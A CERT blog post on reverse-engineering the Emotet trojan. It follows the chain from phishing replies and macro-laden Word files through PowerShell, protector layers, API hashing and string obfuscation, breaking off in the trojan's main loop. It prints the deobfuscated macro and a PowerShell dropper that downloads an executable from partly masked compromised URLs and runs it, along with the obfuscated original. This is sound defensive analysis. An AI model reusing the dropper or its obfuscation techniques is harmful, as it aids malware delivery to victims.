# Reverse engineering Emotet – Our approach to protect GRNET against the trojan **cert.grnet.gr/en/blog/reverse-engineering-emotet/** By Dimitris Kolotouros and Marios Levogiannis ## Preamble In October 2020 we observed an outbreak of malicious e-mails reaching GRNET employees’ inboxes. Meanwhile, similar campaigns were also targeting several public and private sector organizations in Greece. After acquiring dozens of such e-mails, we started planning our defensive strategy. To do so, we started analyzing the malware that was attached to the emails and realized that were dealing with the infamous Emotet trojan. In this document, we describe the steps of our analysis including the reverse engineering process of the malware executables, how we overcame the binary obfuscation techniques it employed, and how we determined the malware’s internals. In the course of our work, we were able to discover the list of IP addresses that constituted the network of Command-andControl (C2) servers of Emotet. This information was very useful because we utilized it to detect any network connections from the GRNET network to the Emotet C2 network. Such connections would indicate a potential compromised workstation in our premises. Overall, the goals of our analysis were to (a) create an infrastructure that received new updates of the Emotet trojan and keep our list of C2 IP addresses up-to-date and (b) understand the trojan’s persistence mechanism to perform forensic invastigations on compromised workstations. ----- [On January 27, 2021 Europol announced that it had completely taken down Emotet. The](https://www.europol.europa.eu/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action) same day our update-monitoring infrastructure received an update which was Europol’s clean-up payload scheduled to be executed on April 25, 2021 at 12:00 p.m.. Hopefully, this will be the last time that we hear about Emotet. Meanwhile, we had been working on analyzing Emotet up to the time of Europol’s announcement. We release our analysis results hoping that IT professionals will find them useful when trying to protect against similar trojans in the future. In [Chapter 1 we describe the malicious e-mails and the malware dropper (a macro-enabled](https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_1_From_the_e-mails_to_the_binaries) MS Word document) delivered via those e-mails. If you are already familiar with Emotet’s [dropper you may directly skip to the next chapters. In Chapter 2 we analyze the malware’s](https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_2_From_the_Protector_to_the_Trojan) multi-layer Protector responsible for unpacking, decrypting and running the trojan for the first time. In [Chapter 3 we describe the binary obfuscation techniques incorporated in the trojan](https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_3_Overcoming_the_malware_obfuscation_techniques) itself as well as the ways to bypass them. In [Chapter 4 we provide an in-depth description of](https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_4_The_trojans_internals) the trojan’s inner-workings, its persistence mechanism, the communication with the Command-and-Control servers network and the way we discovered the C2 network. Finally, in [Chapter 5 we briefly describe the process we followed to retrieve and analyze new](https://cert.grnet.gr/en/blog/reverse-engineering-emotet/#Chapter_5_Monitoring_the_updates) payloads served by the C2 network. We have published the de-compiled code of referenced functions as well as the utilities that [we implemented during the analysis in a GitHub repository.](https://github.com/grnet/emotet-utils) This work was carried out under the supervision of GRNET’s Chief Information Security Officer, Dimitris Mitropoulos. Dimitris Kolotouros – Head of IT Security Department, GRNET Marios Levogiannis – Senior IT Security Engineer, GRNET Figure 0. Emotet stages overview ## Chapter 1. From the e-mails to the binaries ### Introduction ----- October 2020. Seven months have passed since the first COVID-19 lockdown in Greece. The pandemic finds GRNET with a largely broadened IT Security agenda heavily linked with the state’s current digital transformation (involving several new applications being developed and maintained in house). The aforementioned developments, together with the work-from-home style that has just arrived, completely redefined the security perimeter and priorities of GRNET CERT. A new era comes with new challenges. Somewhere in between the various ongoing tasks, a number of weird looking e-mails that reached GRNET employees came to our notice. They all had a similar form, i.e., replies to legitimate mails that either contain a URL or an encrypted ZIP attachment and its password. ### The e-mails First, to raise awareness, we notified all GRNET employees. Then, we started collecting and analyzing the suspicious e-mails. Initially, we inspected their source code looking for similarities. ----- ----- Figure 1. E-mails delivering Emotet dropper via URL (left) and attachment (right) Our analysis led to several interesting remarks: All e-mails were replies to legitimate e-mails. The e-mail subject followed a specific pattern, i.e., “Re: ”. Also, the e-mail body contained the quoted original e-mail body. The sender’s display name was altered to be the same with that of the original e-mail. However, the sender’s e-mail address was some unrelated e-mail address (several compromised e-mail accounts were used). ----- The body of the reply contained either a URL or an attachment. In the case of the URL, the text contained a legitimate domain name (e.g. gmail.com). Nevertheless, the actual target was completely different. Our investigation indicated that they were compromised websites used by the attackers to host the malicious documents. In the case of the attachment we observed encrypted ZIP files with the corresponding password contained in the reply body. Note that password encrypted attachments are commonly used to bypass any malware detection running on e-mail servers. Finally, in all cases we ended up with MS Word documents. ### The MS Word documents Up to this point, we had already been informed about similar cases affecting other public and private sector organizations in Greece. Thus, a conventional incident response was not enough; we wanted to further analyze the malware. Our analysis started with the Word documents. When opening one of the documents, the victim sees a fake pop-up window. In fact, this is just an image inside the document imitating a legitimate pop-up window. In each document the fake pop-up window phrasing was different, but in every case it was there to persuade the victim to enable the Macro execution. ----- ----- ----- Figure2. Fake MS Word pop-ups in Emotet dropper We will continue by analyzing one of the MS Word documents. All other documents were similar to the one examined; albeit with minor differences. ### The VBScript Macros To see what would happen when a user enabled the macros, we examined the corresponding VBScript. The entry-point `Document.Open() called function` ``` Q4hxwcihtett() of module Iauesnh6lzhaf : ``` ----- Figure 3. The VBScript macro entry point The function code, as we observe below, was obfuscated: Figure 4. The main VBSript macro module We started following the code flow manually to understand it. This manual process revealed that most of the code was indeed irrelevant. Specifically, for each meaningful code instruction, the obfuscation process had generated a bunch of meaningless instructions placed before the meaningful one. So, most of the de-obfuscation effort was to identify each block and isolate the meaningful code instruction out of the block. Luckily enough, the attackers had left some traces that were helpful for us. As we noticed, their obfuscating tool had a serious issue (nobody’s perfect). In particular, it did not apply the indentation of the original instruction on the instructions of the replacement block. As a result, the original indentation could be found on the first instruction of each block. This issue gave us a way to automatically detect the blocks and isolate the last instruction of each block, which we knew it was the meaningful instruction of the block. The following obfuscation techniques were identified: ----- Deliberate run-time errors in junk instructions (which were ignored because of the `On` ``` Error Resume Next statement), ``` String construction using one or more of the following: String concatenation, Use of undefined variables that resolve to empty strings, String replacements with the `Replace() function,` Conversion of ASCII codes to strings with the `ChrW() function,` Retrieval of values from hidden user form control elements, Alteration between upper and lower case letters in symbol names, exploiting the case insensitivity of Windows OS, Use of the line-continuation character `_ to break statements in multiple lines.` Then, we only had to manually de-obfuscate some lines of code (the original number of lines was a little more than 400). The result was the following: ``` 01: Rem Attribute VBA_ModuleType=VBADocumentModule 02: Option VBASupport 1 03: Private Sub Document_open() 04: Set storyRange = ThisDocument.StoryRanges.Item(1) 05: Set commandLine = Mid(storyRange, 5, Len(storyRange)) 06: commandLine = Replace(commandLine, "][ 1) jjkgS [] []w", Empty) 07: Set objProcess = CreateObject("winmgmts:Win32_Process") 08: Set objProcessStartup = CreateObject("winmgmts:Win32_ProcessStartup") 09: objProcessStartup.ShowWindow = 0 10: objProcess.Create commandLine, Empty, objProcessStartup 11: End Sub ``` Hence, we were able to answer an important question: “What happens when the user executes this macro?” Well, it spawns a process calling the `Win32_Process.Create() method (line 10). The` startup information parameter says “do not show a window” (line 9). Further, the command line parameter holds the command that will be invoked by the spawned process. As we can observe in the code, the command is already in the document (lines 4-5) together with some junk that is removed (line 6). So there was something more in the document itself apart from the fake popup window. ### The PowerShell script First, we removed the formatting. In this way we revealed a paragraph that was kept out of the victim’s sight (it was formatted with a font size of 2px and a white font color): ----- Figure 5. Obfuscated PowerShell command hidden in document body This looked obfuscated, too. But we already know how to de-obfuscate it, i.e. ``` Replace(commandLine, "][ 1) jjkgS [] []w", Empty) : ``` Figure 6. De-obfuscated PowerShell command The result would attempt to run a PowerShell script that is encoded in base64 format. We decoded it to discover the actual PowerShell script: ----- Figure 7. Base64-decoded PowerShell script After performing a proper indentation, i.e. split lines on each ‘ ; ‘ and perform indentations on code blocks ‘ { ‘ and ‘ } ‘, we got the following: ----- ``` $1D2 [tYpE]( {3}{1}{4}{5}{0}{2} f ecTo, SteM., Ry, sy, Io., diR ); $tJ8m4B =[TYpe]("{2}{4}{5}{1}{3}{0}"-f 'r','iNTmAnAg','sYsteM.nE','e','T','.SerVIcEpO') ; $Ysa212g=('N'+('b7ib0'+'0')); $S95cz34=$I0phsdk + [char](64) + $Ixdbxto; $Qdfg2cp=(('Chns'+'7')+'2'+'d'); (dIR variABle:1D2).valuE::"CR`eAteDir`ectory"($HOME + ((('8U'+'L')+('Pj'+'q')+ ('6t3'+'_8UL'+'Jvn'+'k')+('7'+'yk')+('8U'+'L'))."R`e`place"(('8'+'UL'),'\'))); $Qo08jci=('F'+'5'+('ocx'+'ex')); ( ITEM vARIAblE:Tj8M4B ).VAlUe::"SeC`U`RI`TyPRoTOc`OL" = (('Tl'+'s1')+'2'); $R7w053i=(('Nue'+'l2')+'4'+'k'); $Tedbr00 = ('N'+'1p'+('jur'+'3u')); $H_8yni0=('J6'+'a'+('f'+'fv6')); $Roz09dp=('V'+('t9'+'1oph')); $Glkvf7b=$HOME+(('{0'+'}Pjq6'+'t'+'3_'+'{0'+'}Jvnk7yk{0}') -F[Char]92)+$Tedbr00+ ('.e'+'xe'); $Ads4mxg=(('E'+'2n')+'0j'+'qo'); $Q4b1g5n=.('new-o'+'b'+'jec'+'t') nEt.WEBcLieNt; $Boiep01=((('ht'+'tp:]['+' ')+'1'+((') '))+'jj'+(('kgS [] []w'+']['+' 1)'+' '))+ ('jj'+'kgS []')+(' []wi'+'nnh')+('anma'+'chn.')+(('com]'+'[ 1) '))+'j'+('jkgS'+' []')+(' []'+'w')+'wp'+('-'+'adm')+(('in][ '+'1)'+' j'))+('j'+'kg')+('S []'+' []')+'w'+('sA'+']')+'['+((' 1'+') jjkg'+'S'))+' '+'['+('] '+'[')+']w'+'@h'+ (('ttp:'+']'+'[ '+'1) jj'))+('k'+'gS ')+('[]'+' ')+'['+']'+(('w]['+' 1)'))+(' j'+'j')+('kgS []'+' []'+'wsh')+'om'+'al'+('house'+'.co')+('m]'+'[')+' 1'+((')'+' jjkg'))+('S '+'[]')+(' []wwp-'+'in'+'c'+'lu')+'de'+('s'+'][')+' 1'+((') '))+ ('j'+'jk')+'g'+'S '+('[]'+' [')+(']w'+'I')+('D3'+'][')+' 1'+')'+(' jjk'+'g')+('S '+'[]')+' '+(('['+']wI'+'Dz][ 1)'))+(' jjkg'+'S')+' '+('[] '+'['+']w@h')+ ('ttp'+':]'+'[ ')+(('1)'))+(' '+'jjkgS '+'[] ')+('[]'+'w][')+((' '+'1)'))+(' '+'jjk')+('g'+'S []')+(' ['+']')+'wb'+'lo'+('g'+'.ma')+('r'+'tyr')+('ol'+'ni')+ ('ck.'+'com')+']'+('['+' 1')+((')'+' j'))+'jk'+('gS'+' [] '+'[')+(']wwp'+'-'+'adm')+ ('in'+']')+(('[ 1) '+'jj'))+'k'+('gS ['+'] ')+('['+']wS')+('pq]'+'[ 1')+((') '))+'j'+'jk'+('gS [] []'+'w'+'@htt')+'p'+'s:'+']'+(('[ '+'1) j'+'jkgS '))+'[]'+' '+ ('['+']w]')+'['+' 1'+((') '))+'jj'+('kgS [] ['+']wwww'+'.f')+'r'+ ('ajamom'+'ad'+'ri'+'d.c'+'om')+(']'+'[ 1')+((') j'+'j'))+'kg'+'S '+('[] ['+']w')+ ('wp'+'-')+('cont'+'e')+('nt'+']')+'[ '+'1'+((')'+' j'))+('jk'+'g')+'S'+(' ['+']')+(' '+'[]wg]')+(('[ 1)'+' j'+'jkg'))+'S '+('[]'+' ')+('['+']w@h')+'tt'+(('p'+'s:'+'][ 1'+') '+'jjk'+'gS [] '))+('[]w]['+' ')+(('1)'+' '))+('jjkg'+'S ['+']')+' ['+']w'+ ('p'+'esqui')+('s'+'ac')+'re'+'d'+(('.'+'com][ 1) jj'+'k'))+'g'+'S '+'[]'+(' []w'+'vmw')+('ar'+'e-unl')+('ock'+'e')+('r'+'][ 1')+((') '))+('j'+'jk')+'g'+('S ['+'] ')+('['+']w')+'da'+'C'+']'+'['+((' '+'1) '+'jj'))+('kg'+'S')+' '+('[]'+' ')+'[]'+'w'+'@'+('ht'+'tp')+'s:'+']['+((' 1)'+' '))+'j'+'j'+('k'+'gS')+(' ['+']')+(' ['+']')+('w][ '+'1')+')'+' '+('jj'+'kgS ')+'['+(']'+' []wme')+'d'+('h'+'em')+ (('pfa'+'rm.c'+'om]'+'[ 1)'))+' '+('jj'+'kg')+('S'+' [] [')+(']wwp'+'-a')+'dm'+ ('in'+']')+'['+' '+'1'+((') jjkgS ['+']'+' []w'+'L'))+'b'+(('][ 1'+') jj'))+ ('k'+'gS'+' []')+' '+'[]'+'w'+'@h'+('t'+'tp:][ 1')+')'+(' j'+'jkgS []'+' ')+'['+ (']w]'+'[')+((' 1'+')'))+(' '+'jj')+('kg'+'S []'+' []')+'w'+('ien'+'g')+ ('li'+'sha')+'bc'+('.c'+'o')+(('m]['+' 1)'+' j'))+('jk'+'gS')+((' '+'[]'+' ['+']wc'+'ow][ 1'+') '))+'jj'+'k'+('gS'+' ')+'['+']'+(' '+'[]')+('w2B'+'B')+(('][ '+'1)'))+' '+'j'+('jk'+'g')+('S '+'[] ')+'[]'+'w'))."R`ep`lacE"(((']['+((' '+'1) jjkg'+'S []'))+' '+('[]'+'w'))),([array]('/'),('x'+'we'))[0])."S`PliT"($Od7ccw9 + $S95cz34 + $On55ljg); $Q9eccc5=(('F'+'o4')+'g'+('2'+'rk')); foreach ($S7m_bsh in $Boiep01){ try{ $Q4b1g5n."d`oWnL`Oa`DfIlE"($S7m_bsh, $Glkvf7b); ``` ----- ``` $E4fktea ( D + li +( 0 + 4n_ )); If ((&('Get'+'-Ite'+'m') $Glkvf7b)."l`e`Ngth" -ge 47912) { ([wmiclass]('wi'+('n'+'32')+'_P'+('r'+'ocess')))."CR`e`AtE"($Glkvf7b); $Klmmlcr=(('V6z'+'43'+'q')+'d'); break; $Myse8pt=('S8'+('266j'+'7')) } } catch{ } } $Xwnf9b5=('R_'+('1kl'+'w')+'o') ``` We then noticed some common obfuscation techniques: String formatting to scramble string elements (e.g. `{3}{1}{4}{5}{0}{2}"-f` ``` 'ecTo','SteM.','Ry','sy','Io.','diR' ), ``` Insertions of the word-wrap operator ( ` ) in symbol names (e.g. `d`oWnL`Oa`DfIlE ),` Alteration between upper and lower case letters in symbol names exploiting the case insensitivity of Windows OS (e.g. `nEt.WEBcLieNt ),` String construction with concatenation and junk removal with the `Replace() method,` Use of undefined variables in string concatenations that actually act as empty strings, and Insertion of irrelevant code instructions. We then used a PowerShell interpreter to evaluate strings and after removing irrelevant instructions and renaming the variables, we had the de-obfuscated code: ``` System.IO.Directory::CreateDirectory($HOME + "\\Pjq6t3_\\Jvnk7yk\\"); System.Net.ServicePointManager::SecurityProtocol = "Tls12"; $filepath = $HOME + "\\Pjq6t3_\\Jvnk7yk\\N1pjur3u.exe"; $webclient = New-Object System.Net.WebClient; $urls = "http://in*******hn.com/wp-admin/sA/", "http://sh*******se.com/wp-includes/ID3/IDz/", "http://blog.ma********ck.com/wp-admin/Spq/", "https://www.fr*********id.com/wp-content/g/", "https://pe********ed.com/vmware-unlocker/daC/", "https://me*******rm.com/wp-admin/Lb/", "http://ie*******bc.com/cow/2BB/"; foreach ($url in $urls) { try { $webclient.DownloadFile($url, $filepath); If ((Get-Item $filepath).Length -ge 47912) { ([wmiclass]("Win32_Process")).Create($filepath); break; } } catch {} } ``` ----- The outcome was a script that was pretty simple. Actually, it attempts to download an executable file from several URLs and store it in the following path: ``` $HOME\Pjq6t3_\Jvnk7yk\N1pjur3u.exe (the URLs and the path were different in each ``` Word document). The size of each downloaded file is checked against a minimum value to ensure that if the executable has been removed from the compromised website, the 404 HTML page will be ignored and the next URL will be tried. When a file has been downloaded, it gets executed in a new process by calling the `Win32_Process.Create() method.` After following the same de-obfuscation procedure on every Word document available, we fetched the actual malware executables from the URLs described in the PowerShell scripts. To do so, we imitated the PowerShell User-Agent in a way; we needed to look like a malicious PowerShell script after all! PS. During the course of our analysis we came across several compromised e-mail accounts and websites. In all cases, we sent abuse reports to the corresponding abuse contacts informing them of their compromised assets. ## Chapter 2. From the protector to the trojan ### Introduction In the previous chapter we documented the detection and preliminary analysis of a malware that was distributed via e-mails. We saw that the e-mails included an MS Word document with macros that spawn a new process running a PowerShell script in the victims machine. We also observed that the PowerShell script spawns one more process running an executable file downloaded from the Internet. Finally, we downloaded several of those executable files. With the executable files at hand, we wanted to examine their internals without running them. Thus, we continued with our reverse engineering process. At this point we started working with Ghidra, a free, open-source, reverse engineering tool that was released last year. ### The executable files First, we loaded some of the executable files and observed that they were PE (Portable Executable) files compiled for the x86 LE architecture. ----- Figure 8. Emotet Protector’s architecture details We started looking for meaningful data such as imported symbols and defined strings. To our surprise we observed a number of different programs. Also, we noticed that in every executable file there was one defined string looking like a random key. ----- ----- ----- ----- Figure 9. Random keys in various Emotet Protectors’ strings Apart from that, all the other strings seemed to differ between the executable files. Assuming that this is not a coincidence, we looked for references to these strings in the de-compiled code. While looking, we noticed one more similarity: although the surrounding code also seemed to differ between the executable files, there was an identical code pattern that consumed the alleged key. ----- ----- ----- ----- Figure 10. Code referencing the keys in various Protectors We reverse engineered this part of the code, and ended up with the following code: ----- ``` WPARAM FUN_00407b2e(HINSTANCE param_1,int param_2) { byte *resourceBuffer; _LDR_RESOURCE_INFO resourceInfo; _IMAGE_RESOURCE_DATA_ENTRY *ResourceDataEntry; void *resource; word iv; dword resourceSize; ... resource = (void *)0x0; resourceSize = 0; resourceInfo.Type = 10; resourceInfo.Name = 0x1e55; resourceInfo.Language = 0x409; ... _LdrFindResource_U_PTR = GetProcAddress(s_ntdll_Module2,s_LdrFindResource_U_0040d8cc); ... _LdrAccessResource_PTR = GetProcAddress(s_ntdll_Module2,s_LdrAccessResource_0040d8b4); iVar3 = (*_LdrFindResource_U_PTR)(0x400000,&resourceInfo,3,&ResourceDataEntry); if (-1 < iVar3) { (*_LdrAccessResource_PTR)(0x400000,ResourceDataEntry,&resource,&resourceSize); } resourceBuffer = (byte *)VirtualAlloc((LPVOID)0x0,resourceSize,0x1000,0x40); memcpy(resourceBuffer,resource,resourceSize); DeriveKey(s_*FLrY4bO%4Th$J8Gt0z*zKiB)Yb#mGNy_0040d5b4,0x57,(uint)&iv); DecryptResource(resourceBuffer,resourceSize,&iv); (*(code *)resourceBuffer)(); ... } ``` The code above has the following functionality: Allocates an executable memory region with `VirtualAlloc(), where` `0x40` corresponds to `PAGE_EXECUTE_READWRITE protection level,` loads a specific resource from the executable’s resources into this region, derives a decryption key from the previously mentioned main key, decrypts the contents of the resource using the derived key, and finally, uses the reference to the decrypted data as a function pointer and calls the function. In [deriveKey.c and](https://github.com/grnet/emotet-utils/blob/master/decompiled/deriveKey.c) [decryptResource.c we include the reverse engineered code of the](https://github.com/grnet/emotet-utils/blob/master/decompiled/decryptResource.c) functions. The attackers hid the actual payload in the resource described by the following `RESOURCE_INFO variable:` ``` resourceInfo.Type = 10; resourceInfo.Name = 0x1e55; resourceInfo.Language = 0x409; ``` ----- We found the payload in the resources section of the executable file, just below this mouse icon: Figure 11. The encrypted payload in Emotet Protector’s resources At that point we had the encrypted payload, the main key, the key derivation function and the decryption function. The only thing left was to decrypt the payload. So we reused the reversed engineered `DeriveKey() and` `DecryptResource() functions to write a small` decryption tool. After that we were able to decrypt the resource. ### The decrypted resource Loading the decrypted resource in Ghidra was not just a drag-n-drop task. Apparently, there were no executable headers to let Ghidra infer the architecture details. However, we knew that this payload was loaded in the memory space of the initial executable so we only had to define the architecture to be the same as the initial executable. Furthermore, we knew that the executable starts with a function (the pointer to the memory was handled as a function pointer as previously described). With a little manual work, we managed to analyze the payload with Ghidra: ----- Figure 12. The decrypted resource’s entry-point As shown above, the code pushes some values in the stack and then calls function ``` FUN_0000002d() . The values pushed in the stack must be the function arguments. Among ``` these values we noticed `0x529 and` `0x31529 which Ghidra analyzed as memory` references ( DAT_0000052e and `DAT_0003152e ).` ``` DAT_0003152e contains the last 5 bytes of the executable representing the null-terminated ``` string “ dave ” that looked like a magic value. Figure 13. The referenced DAT_0003152e in decrypted resource ``` DAT_0000052e was more interesting. The first two bytes were the printable characters ``` “MZ”. As you probably know this is the header signature of DOS MZ executables. This was a very good lead. The file can be identified by the ASCII string “MZ” (hexadecimal: 4D 5A) at the beginning of the file (the “magic number”). “MZ” are the initials of Mark Zbikowski, one of leading developers of MS-DOS. _[Wikipedia](https://en.wikipedia.org/wiki/DOS_MZ_executable)_ ----- Figure 14. The MZ magic value in the decrypted resource By further examining the contents of `DAT_0000052e, we identified some known MS-DOS` stub strings, such as the “This program cannot be run in DOS mode”. Of course this resembles a PE executable. Figure 15. The MS-DOS stub in the decrypted resource We went on reversing the `FUN_0000002d() function assuming that its first argument is a` reference to a PE executable. ----- The first difficulty was the mysterious function named `FUN_00000456() . This function is` invoked several times at the beginning of `FUN_0000002d() with a different argument each` time. The return values are stored on local variables and later on they are used as function pointers. Apparently, the function somehow resolved these arguments to function addresses. Thus we needed to reverse engineer `FUN_00000456() .` Figure 16. Symbol resolving in the decrypted resource’s code Examining `FUN_00000456(), we came across a technique for resolving library symbols.` Specifically, the function retrieves the list of loaded libraries ( InLoadOrderModuleList ) from the Process Environment Block (PEB) and loops over each exported symbol of each library. On each loop a combined hash (32-bit value) of the library name and symbol name is calculated. If this value matches the function argument, a pointer to the address of the [corresponding function is returned (in resolveImportByHash.c we include the reverse](https://github.com/grnet/emotet-utils/blob/master/decompiled/resolveImportByHash.c) engineered code of the function). As soon as we understood the internals of the hashing [mechanism, we wrote a short script, generate_symbol_hashes1.py, that calculates these](https://github.com/grnet/emotet-utils/blob/master/utilities/generate_symbol_hashes1.py) hash values for every symbol of several common libraries ( ntdll.dll, `kernel32.dll,` etc) and exports them to a proper (and long) C enumeration: ----- Figure 17. Calculated symbol hashes enumeration After importing the generated enum in our Ghidra project (and properly retyping the function), we had a clear view of which library functions are called later on: Figure 18. Reverse engineered symbol resolving We were now able to continue reversing the `FUN_0000002d() function. After some good` amount of analysis we concluded that the function is a pretty basic binary image loader with [the following function signature (in loadBinary.c we include the complete reverse engineered](https://github.com/grnet/emotet-utils/blob/master/decompiled/loadBinary.c) code): ``` byte * loadBinary(byte *pe_ptr,byte *functionToRunHash,byte *functionToRunParam1, int functionToRunParam2,int copyDosHeader) ``` Internally, the function: allocates the memory buffer (in which the image will be loaded) with ``` VirtualAlloc(), ``` copies the headers from the source image, copies the sections from the source image, loads and links the imported symbols (libraries), applies the relocations, ----- applies proper memory protection to each section with `VirtualProtect() (that way` the executable sections of the loaded binary will be in executable memory sections), runs the executable’s entry-point, runs an exported symbol, the name of which matches the `functionToRunHash hash` value, passing the parameters `functionToRunParam1 and` `functionToRunParam2,` returns a pointer to the allocated buffer. The code at the beginning of the encrypted payload could now be translated into something meaningful: Figure 19. Reverse engineered entry-point In this way, we knew that the executable included at address `0x0000052e will be loaded.` Then, the entry-point is invoked: Figure 20. Reverse engineered code running the nested binary When the entry-point returns, its exported symbol, i.e., an exported function with a name matching the `0xed1c7b90 hash value, will run.` We exported the executable included at address `0x0000052e in a separate file and loaded` it into Ghidra. ### The nested executable We loaded the nested executable in Ghidra and went straight to the entry-point. The entrypoint just calls a function with a couple of parameters. Figure 21. The nested executable’s entry-point You might wonder what is this `DAT_10004070 value. So did we. As a result, we had a quick` look into its contents: ----- Figure 22. MZ magic value in the nested executable That “MZ” signature on the right looks familiar, doesn’t it? Well, this is another nested PE executable! It was like opening a matryoshka doll. We reverse engineered the `FUN_10001000() function and, as you can probably guess, it` was yet another binary image loader with the following function signature: ``` struct_paramContainer * __cdecl loadBinary(byte *pe_ptr,uint pe_size) ``` Internally, it performs the following tasks: allocates the memory buffer (in which the image will be loaded) with ``` VirtualAlloc(), ``` copies the headers from the source image, fixes the relocation table entries according to the offset between the allocated buffer address and the `ImageBase,` loads and links the imported symbols (libraries), copies the sections from the source image and applies proper memory protection to each section with `VirtualProtect() (that way the executable sections of the loaded` binary will be in executable memory), initializes the Thread Local Storage (TLS) according to the image TLS Section, modifies the base addresses ( ImageBaseAddress and `LoaderData-` ``` >InLoadOrderModuleList->DllBase ) of Process Environment Block (PEB) so that ``` they point to the allocated buffer ----- runs the executable s entry-point. Figure 23. Reverse engineered code running the actual trojan Once again we exported the executable included at address `0x10004070 in a separate file` that we had to explore. ## Chapter 3. Overcoming the malware obfuscation techniques ### Introduction In the previous chapter, we explored the steps until the actual trojan is executed. We observed that the downloaded executable, decrypts part of itself and executes the second stage payload. This payload in turn, executes another payload, i.e. the executable that we will analyze in this chapter and Chapter 4. In this Chapter, we’ll fast-forward and describe the obfuscation techniques employed by the latter executable. This will provide us with the necessary background to further explain its functionality in Chapter 4. ### Symbol Resolution Obfuscation The first thing that we noticed after loading the executable in Ghidra was that it does not import any symbols. In particular, it is not feasible for an executable of only 369 KB, to have a Windows API implementation statically linked. Hence, it became obvious that it was probably using a custom mechanism to resolve symbols from system libraries. Figure 24. Emotet trojan’s Symbol Tree ----- Starting from the entry-point, we noticed the following lazy initialization pattern, the result of which is stored in a global variable and is used as a function pointer. The same pattern (and some variations of it) is used all over the executable. Figure 25. Symbol resolving in Emotet trojan’s entry-point Could this be the custom symbol resolution mechanism employed by the trojan to hide the APIs that it uses? To find out, we reversed engineered functions `FUN_00404190() and` ``` FUN_004040f0() . Indeed, these two functions work almost like FUN_00000456() ``` described in Chapter 2: ``` FUN_00404190() starts from the Thread Information Block (the address of which is ``` available from the `FS segment register on 32-bit Windows), accesses the Process` Environment Block (PEB) and iterates over the list of loaded modules ( InLoadOrderModuleList ). For each module, it calculates the hash of its lowercased name and compares it against the specified parameter. If they match, the function returns the module’s base address. Essentially, it works like ``` GetModuleHandle(), but instead of specifying the module’s name, the caller ``` specifies the module name’s hash. ``` FUN_00000456() parses the module specified in the first parameter to find its export ``` table and iterates over the exported symbols. For each exported symbol, it calculates the hash of its name and compares it against the value specified in the second parameter. If they match, it either returns the address that the symbol points to (if the symbol is an export) or recursively resolves the symbol forwarded from another module (if the symbol is a forwarder). [This technique is called API Hashing. In findModuleByHash.c](https://github.com/grnet/emotet-utils/blob/master/decompiled/findModuleByHash.c) [and findModuleExportByHash.c we include the reverse engineered code of the functions.](https://github.com/grnet/emotet-utils/blob/master/decompiled/findModuleExportByHash.c) Again, we wrote a short script, [generate_symbol_hashes2.py, that calculates the hashes for](https://github.com/grnet/emotet-utils/blob/master/utilities/generate_symbol_hashes2.py) every symbol of some common libraries (e.g. `ntdll.dll,` `kernel32.dll, etc.) and` exports them to two C enumerations: ----- ----- Figure 26. Calculated library and symbol names hashes enumerations After importing the enumerations in Ghidra, we had a clear view of the modules and functions imported by these calls. ----- Figure 27. Emotet trojan’s reverse engineered symbol resolving ### String Obfuscation We noticed that the binary did not contain any strings. This made us suspicious because it is impossible for an executable that performs a meaningful functionality, not to contain any strings. As a result, we assumed that some kind of string obfuscation is used. The following is the full list of the strings that we identified. Figure 28. List of defined strings in Emotet trojan The first time we met the use of a string was in a call to `LoadLibraryW(), the only` parameter of which is the name of the library to be loaded. The value passed to `LoadLibraryW() is returned from function` `FUN_004035f0(), which in this case` operates on binary data at memory address `0x40d7f0 . It became apparent that this` function must be doing some kind of transformation (see decryption) to the data pointed to by its input. Figure 29. Emotet trojan’s call of string decryption function We reversed engineered the function and we confirmed our guess, its purpose is to decrypt the input binary data to a Unicode string. The first 4 bytes of the binary data are the XOR key, the next 4 bytes are the string’s encrypted length and the rest are encrypted string itself. After decrypting the length, the function iterates over all quadruples of encrypted characters (remember that the key is 4 bytes long) until all have been decrypted. ----- Figure 30. Emotet trojan’s string decryption internals [For the sake of completeness, in decryptWideString.c we included the reverse engineered](https://github.com/grnet/emotet-utils/blob/master/decompiled/decryptWideString.c) code of that function. ----- Two more versions of this function exist in the executable: one that decrypts the ciphertext to an ASCII string and one to a byte array. Luckily, all are compatible with each other as ciphertexts are processed as 32-bit integers. Only their output types differ. We implemented a tool to decrypt any string or byte array in the executable. The source [code can be found in decrypt_bytes.py.](https://github.com/grnet/emotet-utils/blob/master/utilities/decrypt_bytes.py) ``` $ ./decrypt_bytes.py nested-payload-2.exe 0xb9f0 shlwapi.dll ### Control Flow Obfuscation ``` We continued our analysis with function `FUN_0406860(), the first function that the entry-` point calls, and observed some kind of control flow obfuscation. Specifically, the function’s body is split into multiple `if blocks, wrapped in a` `while loop. The flow is determined by a` control variable that is set at the end of each block. Furthermore, as seen from the function graph below, the majority of the blocks have the same predecessor and successor blocks. This technique resembles the Control Flow Flattening technique, in which each function is split into basic blocks that are encapsulated in a `switch block wrapped in a` `while loop.` ----- Figure 31. Emotet trojan’s Control Flow Obfuscation This technique is also applied to the vast majority of the functions in the executable. We were aware of techniques to automatically de-obfuscate control flow flattening (e.g. the [technique described in this quarkslab blog post), but since the size of the code was small](https://blog.quarkslab.com/deobfuscation-recovering-an-ollvm-protected-program.html) enough we decided to follow the flow manually. ## Chapter 4. The trojan’s internals ### Introduction In the previous chapter we had a look at the trojan executable. We identified several obfuscation techniques incorporated in the executable and described the methods we used to overcome them. In this chapter, we will discuss the trojan’s inner functionalities. ### Main flow overview We followed a depth-first approach to reverse engineer the executable. We started from the function `FUN_0406860(), the one called by the executable’s entry-point, which we called` “main”. ----- Figure 32. Emotet trojan’s entry-point Then, we followed the flow examining each function call. We did this until we reached a function that either made no further calls or only invoked already examined functions. After a couple of weeks we had completely studied the executable’s code. As a result, we were able to draw the code flow of the main function in a meaningful manner. Below, we present the main control loop of the trojan: Figure 33. Emotet ----- trojan’s main function flow chart The basic groups of states are highlighted: Grey states: Initialization of internal variables. Purple states: Persistence-related operations (running during the first run of the trojan or after communicating with the C2 network). Green states: Initialization of parameters related to the communication with the C2 network. Blue states: Initialization of static data to be included in requests to the C2 network. Orange states: Re-initialization of variable data to be included in the next request to the C2 network. Red states: Communication with the chosen C2 server. Yellow state: Handling of the C2 server’s response. Initially, the trojan loads the required libraries (states 1 and 2) and initializes its internal variables (state 3). Then, it checks whether it will run with command line arguments or not (state 4). The existence of command line arguments indicates that this is the 